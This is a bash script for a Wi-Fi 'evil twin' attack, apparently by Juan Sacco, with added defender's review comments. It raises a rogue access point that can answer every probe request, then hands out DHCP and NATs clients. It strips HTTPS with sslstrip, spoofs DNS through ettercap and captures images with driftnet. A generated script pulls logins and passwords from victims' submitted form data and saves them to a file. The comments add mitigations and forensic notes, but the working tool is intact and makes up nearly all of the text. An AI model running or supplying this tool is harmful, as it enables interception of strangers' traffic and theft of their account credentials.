- #!/bin/bash
# Review summary (defender's view): this script stands up a rogue access point
# ("evil twin"), serves DHCP on it, NATs client traffic to the internet,
# redirects plaintext HTTP (tcp/80) through sslstrip and records traffic with
# ettercap and driftnet. It must run as root and it rewrites the host's
# iptables rules and IP-forwarding setting.
#
# Stage 1: build the DNS server list that is later written into the generated
# dhcpd.conf as `option domain-name-servers`. The values come from the
# `nameserver` lines of this host's /etc/resolv.conf, so clients of the rogue
# network are handed the operator's own upstream resolvers.
- var=$(grep "nameserver" /etc/resolv.conf | awk '{print $2}' |wc -l) # count the number of nameservers in resolv.conf
- if [[ $var = 1 ]];then # if 1, use it in dhcpd.conf
- apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}')
- elif [[ $var > 1 ]];then
# Several resolvers: join them into the comma-separated form dhcpd expects.
- apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ',')
- apdns=${apdns//,/", "} # add a space after all commas
- apdns=${apdns%", "} # delete the final comma/space
- else apdns=0 # default in case resolv.conf is empty, which would prevent dhcpd starting
- fi
# Terminal colour escape sequences used for every status message below.
- RED=$(tput setaf 1)
- GREEN=$(tput bold ; tput setaf 2)
- YELLOW=$(tput bold ; tput setaf 3)
- # Network questions
- echo $GREEN
- echo "Juan Sacco - @juansacco - juansacco@gmail.com"
- echo "Wifi - Gemelo Malvado MITM"
- echo
- echo $YELLOW
# Show, then capture, the gateway (field 3) and interface (field 5) of the
# first line printed by `ip route show`; these become the prompt defaults.
- ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Internet Interface :", $5}'
- echo
- iface=$(ip route show | awk '(NR == 1) { print $5}')
- gateway=$(ip route show | awk '(NR == 1) { print $3}')
- echo $GREEN
- echo "Enter the networks gateway IP address or press enter to use $gateway:"
- echo $YELLOW
# NOTE(review): gatewayip is collected here but is not referenced again in the
# lines of the script visible on this page.
- read -e gatewayip
- if [ "$gatewayip" = "" ];then
- gatewayip=$gateway
- echo "$gatewayip selected as default."
- fi
- echo $GREEN
- echo "Enter your interface that is connected to the internet or press enter to use $iface:"
- echo $YELLOW
# Uplink interface; used further down as the --out-interface of the NAT rule.
- read -e internet_interface
- if [ "$internet_interface" = "" ];then
- internet_interface=$iface
- echo "$internet_interface selected as default."
- fi
- echo $GREEN
- echo "Select your interface to be used for the fake AP:"
- echo $YELLOW
# Menu of interface names parsed from `ip link`; `grep -v lo` drops every name
# containing "lo", not only the loopback device.
- interfaces=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
- select fakeap_interface in $interfaces; do
- break;
- done
- echo $GREEN
- echo "Enter the ESSID you would like your rogue AP to be called or press enter to use Fake_AP:"
- echo $YELLOW
# Network name the access point will advertise; defaults to "Fake_AP".
- read -e ESSID
- if [ "$ESSID" = "" ];then
- ESSID="Fake_AP"
- echo "$ESSID selected as default."
- fi
- echo
- sleep 2
- clear
- # Cleaning
# Stop any instances of the helper tools left over from an earlier run.
# All output, including "no process found" errors, is discarded.
- killall sslstrip &> /dev/null
- killall driftnet &> /dev/null
- killall airbase-ng &> /dev/null
- killall ettercap &> /dev/null
- killall looparse &> /dev/null
- # Start Fake Ap interface
# Switch the selected wireless card into monitor mode.
- airmon-ng start $fakeap_interface
# Keep the original interface name in fakeap (window titles, cleanup), then
# point fakeap_interface at "mon0". The monitor interface name is hard-coded
# here rather than taken from airmon-ng's output.
- fakeap=$fakeap_interface
- fakeap_interface="mon0"
- # Dhcpd creation
# SUBNET is first read from the second line of `ip route show` (text before the
# first "/"), but both branches below overwrite it: the rogue network is always
# 192.168.1.0/24 with gateway 192.168.1.1. Only the lease RANGE differs
# (.20-.50 when the detected value was 10.0.0.0, otherwise .200-.220).
- SUBNET=$(ip route show | awk '(NR == 2)' | cut -d '/' -f1)
- if [ "$SUBNET" = "10.0.0.0" ]; then
- SUBNET="192.168.1.0"
- GATEWAY="192.168.1.1"
- RANGE="192.168.1.20 192.168.1.50"
- else
- SUBNET="192.168.1.0"
- GATEWAY="192.168.1.1"
- RANGE="192.168.1.200 192.168.1.220"
- fi
# Working directory for everything the script generates or captures.
# NOTE(review): /tmp/Airssl is a fixed name in a world-writable directory and
# `mkdir -p` succeeds silently if it already exists, so its ownership and
# permissions are never checked before sensitive files are written into it.
- mkdir -p /tmp/Airssl
# Write the dhcpd configuration: 10-minute default lease, the gateway chosen
# above as router, and the resolver list built from /etc/resolv.conf.
- echo "authoritative;
- default-lease-time 600;
- max-lease-time 7200;
- subnet $SUBNET netmask 255.255.255.0 {
- option routers $GATEWAY;
- ddns-update-style none;
- option domain-name-servers $apdns;
- range $RANGE;
- }" > /tmp/Airssl/dhcpd.conf
- # Fake ap setup
# Ask which airbase-ng mode to use and loop until the answer is 1 or 2.
# Per the prompt text below, option 1 makes the access point answer every
# probe request instead of advertising only the chosen ESSID, so the clients
# exposed are those that auto-connect to remembered networks.
# Defensive relevance: removing saved open networks and disabling auto-join on
# clients addresses this; wireless monitoring can alert on a single BSSID
# answering for many different network names.
- while true; do
- sleep 2
- clear
- echo $GREEN
- echo "
- Configuring FakeAP...."
- echo $YELLOW
- echo "Airbase-ng will run in its most basic mode, would you like to run airbase-ng in respond to all probes mode?"
- echo
- echo "In this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes, providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly."
- echo $RED "PLEASE USE THIS OPTION RESPONSIBLY. "
- echo $YELLOW
- echo " 1) Yes"
- echo " 2) No"
- echo -n " #? "
- read yn
- case $yn in
- 1 ) AIRBASE=1 ; break ;;
- 2 ) AIRBASE=0 ; break ;;
- * ) echo
- echo $RED"wrong choice" ;;
- esac
- done
- sleep 2
- clear
- echo $GREEN
- echo "
- Starting FakeAP..."
# Launch airbase-ng in its own xterm on the monitor interface and remember the
# xterm's PID in fakeapid for the cleanup stage. AIRBASE=1 runs the
# respond-to-all-probes variant (-P -C 30); otherwise the AP is started on
# channel 1 with the ESSID entered earlier.
- if [ "$AIRBASE" = "1" ]; then
- xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
- else
- xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
- fi
- sleep 2
- # Tables
- echo
- echo "
- Configuring forwarding tables..." $RED
# Bring up at0 (the interface the rest of the script treats as the client-side
# link of the access point), give it the gateway address and add the route for
# the rogue subnet.
- ifconfig lo up
- ifconfig at0 up &
- sleep 1
- ifconfig at0 $GATEWAY netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net $SUBNET netmask 255.255.255.0 gw $GATEWAY
# NOTE(review): every flush below wipes ALL existing filter and nat rules on
# this host, including any firewall policy that was in place. Nothing is saved
# beforehand and the cleanup stage only flushes again, so the previous rule set
# is not restored.
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
# Turn the host into a router.
- echo 1 > /proc/sys/net/ipv4/ip_forward
# The same flush/forward sequence is repeated twice more below: first with the
# uplink hard-coded as eth0, then as a single && chain that uses the
# $internet_interface chosen at the prompt. Because each pass starts with a
# flush, only the rules from the last pass remain.
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain && iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE && iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
# Redirect forwarded plaintext HTTP (tcp/80) to local port 10000, the port
# sslstrip is later told to listen on. Only port 80 is matched; connections a
# client opens directly over HTTPS are not touched by this rule, which is why
# HSTS (and HSTS preloading) on the server side is the relevant mitigation.
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- # DHCP
- echo $GREEN
- echo "
- Setting up DHCP..."
# Start dhcpd in the foreground of its own xterm, serving at0 with the
# configuration generated under /tmp/Airssl. The xterm PID is kept in dchpid
# (spelled that way here and in the cleanup stage).
- touch /var/run/dhcpd.pid
- #chown dhcpd:dhcpd /var/run/dhcpd.pid
- xterm -bg black -fg green -geometry 153x37-1+0 -T DHCP -e dhcpd -d -f -cf "/tmp/Airssl/dhcpd.conf" at0 & dchpid=$!
- sleep 2
- # Sslstrip
- echo
- echo "
- Starting sslstrip..." $YELLOW
# sslstrip listens on port 10000 (the target of the PREROUTING redirect) and
# writes its log to /tmp/Airssl/sslstrip.log; its stderr is discarded.
# Forensic note: that log is the source the later parsing stages read
# submitted form data from, and it sits in plaintext under /tmp.
- sslstrip -f -p -k -l 10000 -w /tmp/Airssl/sslstrip.log 2> /dev/null & sslstripid=$!
- sleep 2
- # Ettercap
- echo $GREEN
- echo "
- Starting ettercap..."
# ettercap runs in text mode on at0 with its dns_spoof plugin loaded and saves
# the traffic it sees to /tmp/Airssl/etter.cap. The first, commented-out line
# is an earlier curses-interface variant of the same launch.
- #xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -C -P dns_spoof -i at0 & ettercapid=$!
- xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -P dns_spoof -q -w /tmp/Airssl/etter.cap -i at0 & ettercapid=$!
- sleep 2
- ############################
- ## Copied of yamas script ##
- ############################
# Keyword list (one per line) used to pick out form fields whose names suggest
# credentials or session data.
- echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/Airssl/grepcred.txt
# Generate /tmp/Airssl/looparse.sh. The generated script loops forever: every
# 7 seconds it re-reads sslstrip.log, takes the "POST Data" records, splits
# them on "&", keeps fields matching the keyword list and prints them labelled
# as Website / Login / Password. Values shorter than 3 characters are blanked.
# NOTE(review): the script is written to a fixed path under /tmp, made
# executable and run as the current (root) user; combined with the unchecked
# `mkdir -p /tmp/Airssl` earlier, another local user who pre-created that
# directory could replace this file before it is executed.
- echo "looparse(){
- while :
- do
- clear
- echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
- cat /tmp/Airssl/sslstrip.log |
- awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
- awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
- egrep -i -f '/tmp/Airssl/grepcred.txt' |
- awk -F \"=\" '{if (length(\$2) < 3) print \"\";
- else if (\$1 ~/[W]/) print \$0;
- else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
- else print \"Login = \t\t\", \$2}' |
- uniq
- sleep 7
- done
- }
- looparse" > /tmp/Airssl/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
- chmod +x /tmp/Airssl/looparse.sh
# Run the generated parser in an xterm titled "Passwords"; PID kept for cleanup.
- xterm -bg black -fg green -geometry 153x37-1-0 -T Passwords -e /tmp/Airssl/looparse.sh & looparseid=$! #here's the beauty
- ############################
- ############################
- # Driftnet
- echo $GREEN
- echo "
- Starting driftnet..."
# driftnet extracts images from traffic on at0 and stores them in a directory
# named after today's date (Images_DDMMYY) under /tmp/Airssl. The PID is kept
# in dritnetid (spelled that way here and in the cleanup stage).
- mkdir -p "/tmp/Airssl/Images_$(date +%d%m%y)"
- driftnet -i at0 -a -d /tmp/Airssl/Images_$(date +%d%m%y) > /dev/null & dritnetid=$!
- sleep 2
- clear
- echo
- echo "
- Activated..."
- echo $YELLOW
# Status text only. NOTE(review): the image location named in this message
# ($HOME/Airssl/driftftnetdata) does not match the Images_DDMMYY directory that
# driftnet was actually pointed at above.
- echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap.
- You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to "$HOME/Airssl/etter.cap".
- Sslstrip captured passwords will be saved to $HOME/Airssl/passwords.txt.
- Driftnet images will be saved to $HOME/Airssl/driftftnetdata"
- echo
- echo $RED
- echo "
- IMPORTANT..."
- echo "After you have finished please close airssl and clean up properly by hitting any key,
- if airssl is not closed properly ERRORS WILL OCCUR "
# Block until the operator presses Enter; `read` without -n waits for a whole
# line, not a single key. Everything after this point is save-and-teardown.
- read junk
- echo
# Persist the session's results from /tmp/Airssl into $HOME/Airssl.
# Forensic note: after a run, the artifacts left on the operator's host are
# $HOME/Airssl/passwords.txt, $HOME/Airssl/etter.cap and
# $HOME/Airssl/Images_DDMMYY.
- mkdir -p $HOME/Airssl
- ############################
- ## Copied of yamas script ##
- ############################
# Final pass over sslstrip.log with the same POST-data/keyword filter as the
# live parser, except that values shorter than 4 characters are blanked and
# grep runs with -a. Output is appended, so passwords.txt accumulates across
# runs.
- cat /tmp/Airssl/sslstrip.log |
- awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
- awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
- egrep -i -a -f /tmp/Airssl/grepcred.txt |
- awk -F "=" '{if (length($2) < 4) print "";
- else if ($1 ~/Website/) print $0;
- else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
- else print "Login = \t"$2}' |
- uniq >> $HOME/Airssl/passwords.txt
# The `>>` redirection creates passwords.txt even when nothing matched, so this
# test reports success whenever the file could be opened, not only when data
# was written.
- if [ -f "$HOME/Airssl/passwords.txt" ]; then
- echo $GREEN "Passwords saved !"
- else
- echo $RED "Error while saving passwords"
- fi
- ############################
- ############################
# Copy the driftnet image directory; the date is evaluated again here.
- cp -rf /tmp/Airssl/Images_$(date +%d%m%y) $HOME/Airssl
- if [ -d "$HOME/Airssl/Images_$(date +%d%m%y)" ]; then
- echo $GREEN "Images saved !"
- else
- echo $RED "Error while saving images"
- fi
# Copy the ettercap capture file.
- cp -rf /tmp/Airssl/etter.cap $HOME/Airssl
- if [ -f "$HOME/Airssl/etter.cap" ]; then
- echo $GREEN "Capture file saved !"
- else
- echo $RED "Error while Capture file"
- fi
- echo $GREEN
- echo "
- Cleaning up airssl and resetting iptables..." $YELLOW
# Stop every background process started earlier, using the PIDs captured with
# $! at launch; errors are discarded.
- kill ${fakeapid} &> /dev/null
- kill ${dchpid} &> /dev/null
- kill ${sslstripid} &> /dev/null
- kill ${ettercapid} &> /dev/null
- kill ${dritnetid} &> /dev/null
- kill ${looparseid} &> /dev/null
# Take the wireless card out of monitor mode (both the mon0 name and the
# original interface name are passed to airmon-ng stop).
- airmon-ng stop $fakeap_interface
- airmon-ng stop $fakeap
# NOTE(review): IP forwarding is forced to 0 and iptables is flushed to empty,
# regardless of what either was before the script ran. A host that relied on a
# firewall rule set or on forwarding is left without it after this teardown.
- echo "0" > /proc/sys/net/ipv4/ip_forward
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
# Remove the working directory (generated config, logs, capture, parser
# script). The copies made under $HOME/Airssl are not touched.
- rm -rf /tmp/Airssl
- echo $GREEN
- echo "
- Clean up successful..."
- echo
- echo "
- Thank you for using airssl, Good Bye..."
- exit
- Gemelo.sh - Hackeando Facebook y Twitter desde WIFI